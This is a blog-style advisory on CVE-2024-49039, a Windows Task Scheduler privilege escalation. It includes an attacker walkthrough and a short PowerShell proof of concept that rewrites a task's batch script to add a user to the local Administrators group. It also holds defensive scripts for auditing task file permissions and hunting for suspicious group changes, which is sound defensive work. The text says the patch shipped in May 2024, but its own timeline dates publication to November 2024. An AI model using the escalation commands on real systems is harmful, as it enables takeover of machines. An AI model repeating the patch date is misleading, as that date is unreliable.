---
Overview
On May 14, 2024, Microsoft patched CVE-2024-49039, a serious "Elevation of Privilege" vulnerability in Windows Task Scheduler. This bug lets a local user, or malware running as one, gain administrator access on the target Windows computer without knowing any admin password. If you manage Windows systems, understanding this bug is key to keeping your environment secure.
TL;DR:
- Vulnerable: Windows 10/11 and Server (see official advisory)
Why Task Scheduler?
Task Scheduler is a core Windows service. It lets users and apps schedule programs or scripts to run at set times or events. Because scheduled tasks often run with high (sometimes SYSTEM) privileges, a bug here is dangerous.
What’s the Bug?
Microsoft says the vulnerability allows an attacker to run code with SYSTEM privileges, but only if they can *already* run code as a user on that machine.
Security researchers found that due to permission misconfiguration, any user can modify some scheduled tasks or their files, giving them a way to inject malicious commands that will run with much higher rights next time the task runs.
1. Attacker gets a basic shell (as any user) on a target system
Let's say the attacker has a regular user account, or their malware is running as a user.
2. List the scheduled tasks
Microsoft's schtasks tool or PowerShell can list tasks:
schtasks /Query /fo LIST /v
or in PowerShell:
Get-ScheduledTask | Format-Table TaskName,TaskPath,State
3. Find a vulnerable task
The attacker looks for a task with more open-than-normal file permissions, such as one whose XML or associated file can be overwritten, or a task that runs scripts from user-writable locations.
For example, checking permissions on a task definition file (task XML lives under C:\Windows\System32\Tasks):
Get-Acl "C:\Windows\System32\Tasks\MyTask"
4. Overwrite the task file or script
Suppose the attacker can edit C:\Windows\System32\Tasks\VulnerableTask or a script like C:\scripts\autorun.bat that the task runs. They overwrite it to launch a command shell:
REM Malicious autorun.bat
cmd.exe /c net localgroup administrators attacker /add
5. Wait for the scheduled task to run (or trigger it manually)
Since the task runs as SYSTEM, the attacker's code gets executed with the highest privileges.
A Sample Exploit Snippet
Below is a mock-up proof of concept in PowerShell that demonstrates overwriting a script used by a scheduled task (you need to adapt it for a real at-risk environment):
# Suppose C:\scripts\autorun.bat is used by a scheduled task
$malicious = 'net localgroup administrators hacker /add'
Set-Content -Path 'C:\scripts\autorun.bat' -Value $malicious
# Wait for the scheduled task to launch the script (or run the task manually if permitted)
Now, the hacker user will be in the local Administrators group after the task runs.
Patches and Detection
Microsoft patched this in May 2024 Patch Tuesday.
To fix:
- Install the latest updates from Windows Update
- Verify permissions on all scripts and executables used by scheduled tasks, and on the directories that hold them
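The permission check in step 3 and the "verify permissions" fix item above are the same audit seen from the defender's side. The script below is an added example, not code from the original post or from Microsoft: it walks every registered task, collects the task's XML definition plus every program or script path in its actions, and reports any of those files (or their parent directories) on which a low-privilege principal holds write-equivalent rights. It assumes an elevated PowerShell 5.1+ session on Windows 10/11 or Server with the ScheduledTasks module; the principal list and the rights mask are constructed choices you can extend.

```powershell
# Added example (not from the original post): audit scheduled tasks for
# files that low-privilege principals can replace. Run elevated; reading
# C:\Windows\System32\Tasks and other users' files needs admin rights.

# Principals whose write access to a task target is a red flag (constructed list).
$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let the holder change file contents, delete/replace the file,
# or grant themselves such rights. Generic bits cover ACEs stored as
# GENERIC_WRITE (0x40000000) / GENERIC_ALL (0x10000000).
$WriteMask = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
                   [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                   [System.Security.AccessControl.FileSystemRights]::Delete -bor
                   [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                   [System.Security.AccessControl.FileSystemRights]::TakeOwnership) -bor 0x40000000 -bor 0x10000000

function Get-WeakAces {
    # Allow ACEs on $Path granting a low-privilege principal write-equivalent rights.
    # Simplification: Deny ACEs are not evaluated, so treat hits as leads, not proof.
    param([string]$Path)
    if ([string]::IsNullOrWhiteSpace($Path) -or -not (Test-Path -LiteralPath $Path)) { return @() }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $LowPrivPrincipals -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights) -band $WriteMask) -ne 0
    })
}

function Get-TaskTargets {
    # Paths a task depends on: its XML definition under System32\Tasks plus
    # every absolute program or script path in its exec actions and arguments
    # (e.g. cmd.exe /c C:\scripts\autorun.bat exposes the .bat file).
    param($Task)
    $tasksRoot = Join-Path $env:SystemRoot 'System32\Tasks'
    $targets = @(Join-Path $tasksRoot ($Task.TaskPath.TrimStart('\') + $Task.TaskName))
    foreach ($a in $Task.Actions) {
        $candidates = @()
        if ($a.Execute)   { $candidates += $a.Execute }                      # ComHandler actions have no Execute
        if ($a.Arguments) { $candidates += [regex]::Matches($a.Arguments, '"[^"]+"|\S+') | ForEach-Object { $_.Value } }
        foreach ($c in $candidates) {
            $p = [Environment]::ExpandEnvironmentVariables($c.Trim('"'))
            if ($p -match '^([A-Za-z]:\\|\\\\)') { $targets += $p }         # keep drive-letter or UNC paths only
        }
    }
    $targets | Select-Object -Unique
}

function Find-WeakScheduledTasks {
    # One row per (task, path, principal) where a weak ACE was found.
    foreach ($task in Get-ScheduledTask) {
        foreach ($target in Get-TaskTargets -Task $task) {
            # Check the file and its directory: a writable directory lets a
            # low-privilege user swap the file out even if the file ACL is strict.
            foreach ($p in @($target, (Split-Path -Path $target -Parent))) {
                foreach ($ace in Get-WeakAces -Path $p) {
                    [pscustomobject]@{
                        Task      = $task.TaskPath + $task.TaskName
                        RunsAs    = $task.Principal.UserId
                        RunLevel  = $task.Principal.RunLevel
                        Path      = $p
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.FileSystemRights
                    }
                }
            }
        }
    }
}

# Tasks that run as SYSTEM or with RunLevel Highest are the ones to fix first.
Find-WeakScheduledTasks | Sort-Object RunsAs, Task | Format-Table -AutoSize
```

Anything this reports for a task whose RunsAs is SYSTEM (or whose RunLevel is Highest) is exactly the condition the walkthrough above abuses; fix it by tightening the ACL on the file and its directory, or by moving the script to a location only administrators can write.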
Hunt for compromise:
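One concrete hunt for the outcome described above (a task running as SYSTEM adding a user to the local Administrators group) is given below as an added example, not code from the original post or from Microsoft. The logic is: a Security event 4732 (member added to a security-enabled local group) whose target is Administrators and whose subject is the SYSTEM SID is unusual, because administrators normally make that change under their own account; correlating it with Task Scheduler Operational event 200 (action started) shortly before names the task that ran. The functions are written over flattened hashtables so they can be exercised on the constructed sample records embedded here; the live query at the end feeds them from the real logs. It assumes an elevated session, "Audit Security Group Management" enabled for 4732, and the Microsoft-Windows-TaskScheduler/Operational log enabled (it is off by default on many systems).

```powershell
# Added example (not from the original post): hunt for Administrators group
# changes made by SYSTEM and tie them to the scheduled task that ran just before.

function ConvertFrom-EventData {
    # Flatten an event's <EventData> into a hashtable keyed by field name.
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Record)
    $d = @{ Id = $Record.Id; TimeCreated = $Record.TimeCreated }
    $xml = [xml]$Record.ToXml()
    foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    return $d
}

function Test-AdminGroupChangeBySystem {
    # True for a 4732 record where SYSTEM (S-1-5-18) added a member to
    # BUILTIN\Administrators (S-1-5-32-544).
    param([hashtable]$E)
    $toAdmins = ($E.TargetSid -eq 'S-1-5-32-544') -or ($E.TargetUserName -eq 'Administrators')
    $bySystem = ($E.SubjectUserSid -eq 'S-1-5-18')
    return [bool](($E.Id -eq 4732) -and $toAdmins -and $bySystem)
}

function Find-TaskDrivenAdminAdds {
    # For each suspicious 4732, list task actions (event 200) started within
    # the preceding window so the responsible task can be inspected.
    param(
        [hashtable[]]$SecurityEvents,      # flattened Security 4732 records
        [hashtable[]]$TaskEvents,          # flattened TaskScheduler/Operational 200 records
        [int]$WindowMinutes = 5
    )
    foreach ($e in ($SecurityEvents | Where-Object { Test-AdminGroupChangeBySystem $_ })) {
        $recent = $TaskEvents | Where-Object {
            $_.TimeCreated -le $e.TimeCreated -and
            $_.TimeCreated -ge $e.TimeCreated.AddMinutes(-$WindowMinutes)
        }
        [pscustomobject]@{
            When           = $e.TimeCreated
            MemberSid      = $e.MemberSid
            AddedBy        = $e.SubjectUserName
            PrecedingTasks = (($recent | ForEach-Object { "$($_.TaskName) [$($_.ActionName)]" }) -join '; ')
        }
    }
}

# --- Constructed sample records (not real log output) to exercise the logic offline ---
$t0 = Get-Date '2024-05-15T03:00:00'
$sampleSecurity = @(
    # SYSTEM added a user to Administrators one minute after a task action: suspicious.
    @{ Id = 4732; TimeCreated = $t0.AddMinutes(1); SubjectUserSid = 'S-1-5-18'; SubjectUserName = 'HOST01$'
       TargetUserName = 'Administrators'; TargetSid = 'S-1-5-32-544'; MemberSid = 'S-1-5-21-1111-2222-3333-1005' },
    # A named administrator made the same kind of change interactively: normal.
    @{ Id = 4732; TimeCreated = $t0.AddHours(2); SubjectUserSid = 'S-1-5-21-1111-2222-3333-500'; SubjectUserName = 'itadmin'
       TargetUserName = 'Administrators'; TargetSid = 'S-1-5-32-544'; MemberSid = 'S-1-5-21-1111-2222-3333-1010' }
)
$sampleTask = @(
    @{ Id = 200; TimeCreated = $t0; TaskName = '\VulnerableTask'; ActionName = 'C:\scripts\autorun.bat' }
)
Find-TaskDrivenAdminAdds -SecurityEvents $sampleSecurity -TaskEvents $sampleTask | Format-Table -AutoSize

# --- Live version: same logic over the last 7 days of the real logs ---
$since = (Get-Date).AddDays(-7)
$live4732 = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4732; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object { ConvertFrom-EventData $_ }
$live200 = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-TaskScheduler/Operational'; Id = 200; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object { ConvertFrom-EventData $_ }
Find-TaskDrivenAdminAdds -SecurityEvents $live4732 -TaskEvents $live200 | Format-Table -AutoSize
```

On the constructed sample only the first 4732 is reported, with \VulnerableTask listed as the preceding task action. A hit on real logs is a strong lead, not a verdict: check the named task's action file against the permission audit, and expect to widen the hunt to 4702 (task updated) and 4698 (task created) records made by non-administrative accounts.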
References
- Microsoft CVE-2024-49039 Advisory
- Patch Release Notes
- Huntress Labs Writeup on Task Scheduler Vulnerabilities
- Detailed Task Scheduler Technical Docs
Bottom Line
CVE-2024-49039 is another reminder that local privilege escalation bugs can turn a small foothold into full system takeover on Windows. Always keep systems patched, review your scheduled tasks, and be careful what runs with SYSTEM privileges.
Timeline
Published on: 11/12/2024 18:15:44 UTC
Last modified on: 11/16/2024 23:40:54 UTC